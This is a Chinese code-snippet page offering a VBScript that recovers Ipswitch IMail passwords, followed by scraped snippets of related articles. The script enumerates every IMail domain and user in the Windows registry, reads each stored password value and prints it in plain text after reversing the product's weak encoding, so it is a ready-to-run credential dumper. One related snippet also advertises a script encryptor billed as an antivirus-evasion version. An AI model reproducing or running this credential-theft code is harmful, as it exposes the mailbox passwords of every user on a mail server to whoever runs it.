vbs imail 密码解密_vbs

复制代码 代码如下:

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Ipswitch\IMail\Domains"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath, arrSubKeys
For Each subkey In arrSubKeys
wscript.echo "Domain: "&subkey
strKeyPath2 = strKeyPath&"\"&subkey&"\Users"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath2, arrSubKeys2
For Each subkey2 In arrSubKeys2
strKeyPath3=strKeyPath2&"\"&subkey2
strValueName = "Password"
oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath3,strValueName,strValue
if len(subkey2) and len(strValue) then
wscript.echo subkey2 &" : " & decrypt(subkey2,strValue)
end if
Next
Next

function decrypt(name,pass)
while len(name)<len(pass)/2
name=name&name
wend
for i=0 to len(pass)/2-1
p=mid(pass,2*i+1,2)
p="&H"&p
n=mid(name,i+1,1)
decrypt=decrypt&chr(clng(p)-asc(n))
next
end function

时间: 2024-09-26 07:11:50

vbs imail 密码解密_vbs的相关文章

Imail密码加密算法及VBS实现_vbs

Imail的所有邮局信息,比如用户,密码都实际上都是存储在计算机注册表当中的,所以只需要 打开注册表就可以看到Imail里的所有信息,包括用户的密码.细节: Imail将企业邮局信息全部存储在: HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\<DOMAINNAME>\Users\<USERNAME> 这样一个键里,其中DomainName是邮局名,UserName是用户名,而在<USERNAME>下有一个名叫Pas

Imail密码加密算法及asp实现

加密|算法 简述:Imail是一个流行的运行在WindowsNT服务器下的邮件服务器软件,因为配置简单,容易使用,功能完善.所以现在很多虚拟主机服务商或企业均是采用这个邮件系统.Imail的所有邮局信息,比如用户,密码都实际上都是存储在计算机注册表当中的,所以只需要打开注册表就可以看到Imail里的所有信息,包括用户的密码. 细节:Imail将企业邮局信息全部存储在:HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\<DOMAINNAME>\

影子经纪人再次归来,公开密码解密更多NSA黑客工具!连中国运营商都被入侵过?

影子经纪人再次归来,公开密码解密更多NSA黑客工具!连中国运营商都被入侵过? 我们最近一次报道Shadow Brokers的消息是在今年1月份,当时Shadow Brokers似乎已经"决定退隐江湖".就在近日,这个神秘组织又放出了据说是属于NSA方程式的更多入侵工具和exploit. 首先我们还是来简单地做个前情提要,去年8月份这个名叫Shadow Brokers的黑客组织横空出世,在网上放出据说是来自NSA的一波入侵工具--专家在研究过这些工具后认为,此系列工具隶属于NSA旗下的方

用VBS实现的凯撒密码算法_vbs

在密码学中,恺撒密码(或称恺撒加密.恺撒变换)是一种最简单且最广为人知的加密技术.它是一种替换加密的技术,明文中的所有字母都在字母表上向後(或向前)按照一个固定数目进行偏移後被替换成密文.例如,当偏移量是3的时候,所有的字母A将被替换成D,B变成E,以此类推.这个加密方法是以恺撒的名字命名的,当年恺撒曾用此方法与其将军们进行联系. 例如,当偏移量是左移3的时候(解密时的密钥就是3): 复制代码 代码如下: 明文字母表:ABCDEFGHIJKLMNOPQRSTUVWXYZ 密文字母表:DEFGHI

VBS脚本加密/解密VBS脚本(简易免杀版1.1)_vbs

Dim WshSHell,FSO On Error Resume Next Set WshSHell = WScript.CreateObject("WScript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") Set Args = WScript.Arguments Ver="1.1" CloseTime = 5 FileName = WScript.ScriptNam

VBS 偏移量解密工具[算法解密]_vbs

复制代码 代码如下: If wscript.arguments.count=0 Or wscript.arguments.Count>1 then msgbox "请将通过偏移量加密过的 VBS 文件拖放到本脚本上即可[请逐个解密]!",48,"提示" wscript.quit End If For Each fname In wscript.Arguments If Right(fname,3)<> "vbs" Then Ms

vbs版的解密base64加密的脚本_vbs

复制代码 代码如下: Function fDecode(sStringToDecode)  'This function will decode a Base64 encoded string and returns the decoded string.  'This becomes usefull when attempting to hide passwords from prying eyes.  Const CharList = "ABCDEFGHIJKLMNOPQRSTUVWXYZa

Iiscnfg.vbs IIS 配置脚本_vbs

导入和导出本地或远程计算机上 Internet 信息服务 (IIS) 配置数据库的所有或选定元素,或者将整个 IIS 配置(配置数据库和架构)复制到另一台计算机以复制配置.Iiscnfg 执行下列功能: 若要查看该命令语法,请单击以下命令: iiscnfg /export 以加密或未加密格式将所有或部分 IIS 配置数据库复制到 XML 文件.然后可在导入操作中使用 XML 文件来将所有或部分配置数据库复制到其他 IIS 配置. 语法 iiscnfg[.vbs] /export /f [Path

使用 Iisftp.vbs 删除FTP站点_vbs

应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1 可以使用命令行脚本 iisftp.vbs(存储在 systemroot\System32\ 中)在运行带有 IIS 6.0 的 Windows Server 2003 家族成员的本地或远程计算机上删除 IIS 文件传输协议 (FTP) 站点配置. 如果打算将站点移到新的 URL 或服务器,或者要完全删除该站点,则该命令是很有用的.站点内容不